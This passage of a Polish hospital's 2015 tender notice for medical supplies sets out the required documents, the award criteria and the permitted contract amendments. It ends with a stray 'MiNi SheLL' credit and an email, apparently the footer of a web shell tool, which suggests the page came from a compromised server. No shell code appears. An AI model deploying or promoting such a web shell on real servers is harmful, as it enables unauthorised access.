III.6.2)	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów.
III.6.3)	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego produktu,
b)	nazwy produktu przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych brutto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny netto mogą ulec zmianie w przypadku wzrostu/spadku: 
a).	cen urzędowych,
b).	obowiązujących stawek podatków i opłat granicznych,  
5.	W przypadku zmiany cen produktów leczniczych ujętych w wykazie refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (dalej: lista leków refundowanych) Zamawiający dokonywać będzie zakupu produktu po cenie urzędowej obowiązującej w dniu wystawienia faktury, z zastrzeżeniem, iż % różnica w stosunku do ceny urzędowej zastosowana przez Wykonawcę w ofercie, w odniesieniu do poszczególnych produktów, obowiązywać będzie w trakcie realizacji umowy po każdej zmianie cen urzędowych. 
6.	Za zgodą Zamawiającego Wykonawca może zaoferować odpowiednik, po cenie nie wyższej niż cena produktu objętego umową z zastrzeżeniem § 2 ust. 10.
7.	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny.
8.	Zaistnienie okoliczności wymienionych w ust 6 - 7 nie wymaga sporządzenia aneksu.
9.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji oferowanego produktu
b)	wygaśnięcia rejestracji oferowanego produktu
10.	Na potwierdzenie okoliczności, o których mowa w ust. 9 Wykonawca przedstawi zawiadomienie producenta.
11.	Wykonawca w sytuacji określonej w ust. 9, w porozumieniu z Zamawiającym zaproponuje, w terminie do 5 dni od przedstawienia stosownych dokumentów, produkt równoważny na zasadach wynikających z ust. 6, z zachowaniem formy pisemnej pod rygorem nieważności.
12.	W przypadku zmiany bądź rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest niezwłocznie w formie pisemnej wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy, im. bł. Marty Wieckiej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2015 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com